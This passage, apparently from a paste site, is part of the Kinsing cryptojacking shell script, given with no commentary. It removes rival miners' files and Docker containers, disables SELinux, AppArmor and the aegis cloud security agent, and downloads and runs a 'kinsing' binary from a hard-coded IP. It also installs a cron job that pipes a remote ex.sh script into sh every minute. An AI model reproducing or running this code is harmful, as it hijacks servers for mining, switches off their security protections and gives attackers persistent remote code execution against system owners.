  437. rm -rf /tmp/fs
  438. rm -rf /tmp/.rod
  439. rm -rf /tmp/.rod.tgz
  440. rm -rf /tmp/.rod.tgz.1
  441. rm -rf /tmp/.rod.tgz.2
  442. rm -rf /tmp/.mer
  443. rm -rf /tmp/.mer.tgz
  444. rm -rf /tmp/.mer.tgz.1
  445. rm -rf /tmp/.hod
  446. rm -rf /tmp/.hod.tgz
  447. rm -rf /tmp/.hod.tgz.1
  448. rm -rf /tmp/84Onmce
  449. rm -rf /tmp/C4iLM4L
  450. rm -rf /tmp/lilpip
  451. rm -rf /tmp/3lmigMo
  452. rm -rf /tmp/am8jmBP
  453. rm -rf /tmp/tmp.txt
  454. rm -rf /tmp/baby
  455. rm -rf /tmp/.lib
  456. rm -rf /tmp/systemd
  457. rm -rf /tmp/lib.tar.gz
  458. rm -rf /tmp/baby
  459. rm -rf /tmp/java
  460. rm -rf /tmp/j2.conf
  461. rm -rf /tmp/.mynews1234
  462. rm -rf /tmp/a3e12d
  463. rm -rf /tmp/.pt
  464. rm -rf /tmp/.pt.tgz
  465. rm -rf /tmp/.pt.tgz.1
  466. rm -rf /tmp/go
  467. rm -rf /tmp/java
  468. rm -rf /tmp/j2.conf
  469. rm -rf /tmp/.tmpnewasss
  470. rm -rf /tmp/java
  471. rm -rf /tmp/go.sh
  472. rm -rf /tmp/go2.sh
  473. rm -rf /tmp/khugepageds
  474. rm -rf /tmp/.censusqqqqqqqqq
  475. rm -rf /tmp/.kerberods
  476. rm -rf /tmp/kerberods
  477. rm -rf /tmp/seasame
  478. rm -rf /tmp/touch
  479. rm -rf /tmp/.p
  480. rm -rf /tmp/runtime2.sh
  481. rm -rf /tmp/runtime.sh
  482. rm -rf /dev/shm/z3.sh
  483. rm -rf /dev/shm/z2.sh
  484. rm -rf /dev/shm/.scr
  485. rm -rf /dev/shm/.kerberods
  486. rm -f /etc/ld.so.preload
  487. rm -f /usr/local/lib/libioset.so
  488. chattr -i /etc/ld.so.preload
  489. rm -f /etc/ld.so.preload
  490. rm -f /usr/local/lib/libioset.so
  491. rm -rf /tmp/watchdogs
  492. rm -rf /etc/cron.d/tomcat
  493. rm -rf /etc/rc.d/init.d/watchdogs
  494. rm -rf /usr/sbin/watchdogs
  495. rm -f /tmp/kthrotlds
  496. rm -f /etc/rc.d/init.d/kthrotlds
  497. rm -rf /tmp/.sysbabyuuuuu12
  498. rm -rf /tmp/logo9.jpg
  499. rm -rf /tmp/miner.sh
  500. rm -rf /tmp/nullcrew
  501. rm -rf /tmp/proc
  502. rm -rf /tmp/2.sh
  503. rm /opt/atlassian/confluence/bin/1.sh
  504. rm /opt/atlassian/confluence/bin/1.sh.1
  505. rm /opt/atlassian/confluence/bin/1.sh.2
  506. rm /opt/atlassian/confluence/bin/1.sh.3
  507. rm /opt/atlassian/confluence/bin/3.sh
  508. rm /opt/atlassian/confluence/bin/3.sh.1
  509. rm /opt/atlassian/confluence/bin/3.sh.2
  510. rm /opt/atlassian/confluence/bin/3.sh.3
  511. rm -rf /var/tmp/f41
  512. rm -rf /var/tmp/2.sh
  513. rm -rf /var/tmp/config.json
  514. rm -rf /var/tmp/xmrig
  515. rm -rf /var/tmp/1.so
  516. rm -rf /var/tmp/kworkerds3
  517. rm -rf /var/tmp/kworkerdssx
  518. rm -rf /var/tmp/kworkerds
  519. rm -rf /var/tmp/wc.conf
  520. rm -rf /var/tmp/nadezhda.
  521. rm -rf /var/tmp/nadezhda.arm
  522. rm -rf /var/tmp/nadezhda.arm.1
  523. rm -rf /var/tmp/nadezhda.arm.2
  524. rm -rf /var/tmp/nadezhda.x86_64
  525. rm -rf /var/tmp/nadezhda.x86_64.1
  526. rm -rf /var/tmp/nadezhda.x86_64.2
  527. rm -rf /var/tmp/sustse3
  528. rm -rf /var/tmp/sustse
  529. rm -rf /var/tmp/moneroocean/
  530. rm -rf /var/tmp/devtool
  531. rm -rf /var/tmp/devtools
  532. rm -rf /var/tmp/play.sh
  533. rm -rf /var/tmp/systemctI
  534. rm -rf /var/tmp/update.sh
  535. rm -rf /var/tmp/.java
  536. rm -rf /var/tmp/1.sh
  537. rm -rf /var/tmp/conf.n
  538. rm -r /var/tmp/lib
  539. rm -r /var/tmp/.lib
  540. rm -rf /tmp/config.json
  541. chattr -iau /tmp/lok
  542. chmod +700 /tmp/lok
  543. rm -rf /tmp/lok
  544. #yum install -y docker.io || apt-get install docker.io;
  545. docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill %
  546. docker ps | grep "gakeaws" | awk '{print $1}' | xargs -I % docker kill %
  547. docker ps | grep "azulu" | awk '{print $1}' | xargs -I % docker kill %
  548. docker ps | grep "auto" | awk '{print $1}' | xargs -I % docker kill %
  549. docker ps | grep "xmr" | awk '{print $1}' | xargs -I % docker kill %
  550. docker ps | grep "mine" | awk '{print $1}' | xargs -I % docker kill %
  551. docker ps | grep "monero" | awk '{print $1}' | xargs -I % docker kill %
  552. docker ps | grep "slowhttp" | awk '{print $1}' | xargs -I % docker kill %
  553. docker ps | grep "bash.shell" | awk '{print $1}' | xargs -I % docker kill %
  554. docker ps | grep "entrypoint.sh" | awk '{print $1}' | xargs -I % docker kill %
  555. docker ps | grep "/var/sbin/bash" | awk '{print $1}' | xargs -I % docker kill %
  556. docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f %
  557. docker images -a | grep "gakeaws" | awk '{print $3}' | xargs -I % docker rmi -f %
  558. docker images -a | grep "buster-slim" | awk '{print $3}' | xargs -I % docker rmi -f %
  559. docker images -a | grep "hello-" | awk '{print $3}' | xargs -I % docker rmi -f %
  560. docker images -a | grep "azulu" | awk '{print $3}' | xargs -I % docker rmi -f %
  561. docker images -a | grep "registry" | awk '{print $3}' | xargs -I % docker rmi -f %
  562. docker images -a | grep "xmr" | awk '{print $3}' | xargs -I % docker rmi -f %
  563. docker images -a | grep "auto" | awk '{print $3}' | xargs -I % docker rmi -f %
  564. docker images -a | grep "mine" | awk '{print $3}' | xargs -I % docker rmi -f %
  565. docker images -a | grep "monero" | awk '{print $3}' | xargs -I % docker rmi -f %
  566. docker images -a | grep "slowhttp" | awk '{print $3}' | xargs -I % docker rmi -f %
  567. setenforce 0
  568. echo SELINUX=disabled >/etc/selinux/config
  569. service apparmor stop
  570. systemctl disable apparmor
  571. service aliyun.service stop
  572. systemctl disable aliyun.service
  573. ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %
  574. ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %
  575. rm -rf /usr/local/aegis
  576.  
  577.  
  578. BIN_MD5="648effa354b3cbaad87b45f48d59c616"
  579. BIN_DOWNLOAD_URL="http://45.137.155.55/kinsing"
  580. BIN_DOWNLOAD_URL2="http://45.137.155.55/kinsing"
  581. BIN_NAME="kinsing"
  582.  
  583. ROOTUID="0"
  584. BIN_PATH="/etc"
  585. if [ "$(id -u)" -ne "$ROOTUID" ] ; then
  586.   BIN_PATH="/tmp"
  587.   if [ ! -e "$BIN_PATH" ] || [ ! -w "$BIN_PATH" ]; then
  588.     echo "$BIN_PATH not exists or not writeable"
  589.     mkdir /tmp
  590.   fi
  591.   if [ ! -e "$BIN_PATH" ] || [ ! -w "$BIN_PATH" ]; then
  592.     echo "$BIN_PATH replacing with /var/tmp"
  593.     BIN_PATH="/var/tmp"
  594.   fi
  595.   if [ ! -e "$BIN_PATH" ] || [ ! -w "$BIN_PATH" ]; then
  596.     TMP_DIR=$(mktemp -d)
  597.     echo "$BIN_PATH replacing with $TMP_DIR"
  598.     BIN_PATH="$TMP_DIR"
  599.   fi
  600.   if [ ! -e "$BIN_PATH" ] || [ ! -w "$BIN_PATH" ]; then
  601.     echo "$BIN_PATH replacing with /dev/shm"
  602.     BIN_PATH="/dev/shm"
  603.   fi
  604.   if [ -d "$BIN_PATH/$BIN_NAME" ]; then
  605.     echo "$BIN_PATH/$BIN_NAME is directory"
  606.     rm -rf $BIN_PATH/$BIN_NAME
  607.   fi
  608.   if [ -e "$BIN_PATH/$BIN_NAME" ]; then
  609.     echo "$BIN_PATH/$BIN_NAME exists"
  610.     if [ ! -w "$BIN_PATH/$BIN_NAME" ]; then
  611.       echo "$BIN_PATH/$BIN_NAME not writeable"
  612.       ls -la $BIN_PATH | grep -e "/dev" | grep -v grep
  613.       if [ $? -eq 0 ]; then
  614.         rm -rf $BIN_PATH/$BIN_NAME
  615.         rm -rf $BIN_PATH/kdevtmpfsi
  616.         echo "found /dev"
  617.       else
  618.         echo "not found /dev"
  619.       fi
  620.       TMP_BIN_NAME=$(head -3 /dev/urandom | tr -cd '[:alnum:]' | cut -c -8)
  621.       BIN_NAME="kinsing_$TMP_BIN_NAME"
  622.     else
  623.       echo "writeable $BIN_PATH/$BIN_NAME"
  624.     fi
  625.   fi
  626. fi
  627.  
  628. BIN_FULL_PATH="$BIN_PATH/$BIN_NAME"
  629. echo "$BIN_FULL_PATH"
  630.  
  631. LDR="wget -q -O -"
  632. if [ -s /usr/bin/curl ]; then
  633.   LDR="curl"
  634. fi
  635. if [ -s /usr/bin/wget ]; then
  636.   LDR="wget -q -O -"
  637. fi
  638.  
  639. if [ -x "$(command -v curl)" ]; then
  640.   WGET="curl -o"
  641. elif [ -x "$(command -v wget)" ]; then
  642.   WGET="wget -O"
  643. else
  644.   echo "wget none"
  645. fi
  646. echo "wget is $WGET"
  647.  
  648. ls -la $BIN_PATH | grep -e "/dev" | grep -v grep
  649. if [ $? -eq 0 ]; then
  650.   rm -rf $BIN_FULL_PATH
  651.   rm -rf $SO_FULL_PATH
  652.   rm -rf $BIN_PATH/kdevtmpfsi
  653.   rm -rf $BIN_PATH/libsystem.so
  654.   rm -rf /tmp/kdevtmpfsi
  655.   echo "found /dev"
  656. else
  657.   echo "not found /dev"
  658. fi
  659.  
  660. checkExists() {
  661.   CHECK_PATH=$1
  662.   MD5=$2
  663.   sum=$(md5sum $CHECK_PATH | awk '{ print $1 }')
  664.   retval=""
  665.   if [ "$MD5" = "$sum" ]; then
  666.     echo >&2 "$CHECK_PATH is $MD5"
  667.     retval="true"
  668.   else
  669.     echo >&2 "$CHECK_PATH is not $MD5, actual $sum"
  670.     retval="false"
  671.   fi
  672.   echo "$retval"
  673. }
  674.  
  675. download() {
  676.   DOWNLOAD_PATH=$1
  677.   DOWNLOAD_URL=$2
  678.   if [ -L $DOWNLOAD_PATH ]
  679.   then
  680.     rm -rf $DOWNLOAD_PATH
  681.   fi
  682.   chmod 777 $DOWNLOAD_PATH
  683.   $WGET $DOWNLOAD_PATH $DOWNLOAD_URL
  684.   chmod +x $DOWNLOAD_PATH
  685. }
  686.  
  687. binExists=$(checkExists "$BIN_FULL_PATH" "$BIN_MD5")
  688. if [ "$binExists" = "true" ]; then
  689.   echo "$BIN_FULL_PATH exists and checked"
  690. else
  691.   echo "$BIN_FULL_PATH not exists"
  692.   download $BIN_FULL_PATH $BIN_DOWNLOAD_URL
  693.   binExists=$(checkExists "$BIN_FULL_PATH" "$BIN_MD5")
  694.   if [ "$binExists" = "true" ]; then
  695.     echo "$BIN_FULL_PATH after download exists and checked"
  696.   else
  697.     echo "$BIN_FULL_PATH after download not exists"
  698.     download $BIN_FULL_PATH $BIN_DOWNLOAD_URL2
  699.     binExists=$(checkExists "$BIN_FULL_PATH" "$BIN_MD5")
  700.     if [ "$binExists" = "true" ]; then
  701.       echo "$BIN_FULL_PATH after download2 exists and checked"
  702.     else
  703.       echo "$BIN_FULL_PATH after download2 not exists"
  704.     fi
  705.   fi
  706. fi
  707.  
  708. chmod 777 $BIN_FULL_PATH
  709. chmod +x $BIN_FULL_PATH
  710. SKL=ex $BIN_FULL_PATH
  711.  
  712. crontab -l | sed '/#wget/d' | crontab -
  713. crontab -l | sed '/#curl/d' | crontab -
  714. crontab -l | grep -e "185.191.32.198" | grep -v grep
  715. if [ $? -eq 0 ]; then
  716.   echo "cron good"
  717. else
  718.   (
  719.     crontab -l 2>/dev/null
  720.     echo "* * * * * $LDR http://185.191.32.198/ex.sh | sh > /dev/null 2>&1"
  721.   ) | crontab -
  722. fi
  723.  
  724. crontab -l | sed '/base64/d' | crontab -
  725. crontab -l | sed '/update.sh/d' | crontab -
  726. crontab -l | sed '/logo4/d' | crontab -
  727. crontab -l | sed '/logo9/d' | crontab -
  728. crontab -l | sed '/logo0/d' | crontab -
  729. crontab -l | sed '/logo/d' | crontab -
  730. crontab -l | sed '/tor2web/d' | crontab -
  731. crontab -l | sed '/jpg/d' | crontab -
  732. crontab -l | sed '/png/d' | crontab -
  733. crontab -l | sed '/tmp/d' | crontab -
  734. crontab -l | sed '/zmreplchkr/d' | crontab -
  735. crontab -l | sed '/aliyun.one/d' | crontab -
  736. crontab -l | sed '/3.215.110.66.one/d' | crontab -
  737. crontab -l | sed '/pastebin/d' | crontab -
  738. crontab -l | sed '/onion/d' | crontab -
  739. crontab -l | sed '/lsd.systemten.org/d' | crontab -
  740. crontab -l | sed '/shuf/d' | crontab -
  741. crontab -l | sed '/ash/d' | crontab -
  742. crontab -l | sed '/mr.sh/d' | crontab -
  743. crontab -l | sed '/185.181.10.234/d' | crontab -
  744. crontab -l | sed '/localhost.xyz/d' | crontab -
  745. crontab -l | sed '/45.137.151.106/d' | crontab -
  746. crontab -l | sed '/111.90.159.106/d' | crontab -
  747. crontab -l | sed '/github/d' | crontab -
  748. crontab -l | sed '/bigd1ck.com/d' | crontab -
  749. crontab -l | sed '/xmr.ipzse.com/d' | crontab -
  750. crontab -l | sed '/185.181.10.234/d' | crontab -
  751. crontab -l | sed '/146.71.79.230/d' | crontab -
  752. crontab -l | sed '/122.51.164.83/d' | crontab -
  753. crontab -l | sed '/newdat.sh/d' | crontab -
  754. crontab -l | sed '/lib.pygensim.com/d' | crontab -
  755. crontab -l | sed '/t.amynx.com/d' | crontab -
  756. crontab -l | sed '/update.sh/d' | crontab -
  757. crontab -l | sed '/systemd-service.sh/d' | crontab -
  758. crontab -l | sed '/pg_stat.sh/d' | crontab -
  759. crontab -l | sed '/sleep/d' | crontab -
  760. crontab -l | sed '/oka/d' | crontab -
  761. crontab -l | sed '/linux1213/d' | crontab -
  762. crontab -l | sed '/zsvc/d' | crontab -
  763. crontab -l | sed '/_cron/d' | crontab -
  764. crontab -l | sed '/31.210.20.181/d' | crontab -
  765. crontab -l | sed '/givemexyz/d' | crontab -
  766. crontab -l | sed '/world/d' | crontab -
  767. crontab -l | sed '/1.sh/d' | crontab -
  768. crontab -l | sed '/3.sh/d' | crontab -
  769. crontab -l | sed '/workers/d' | crontab -
  770. crontab -l | sed '/oracleservice/d' | crontab -
Add Comment
Please, Sign In to add comment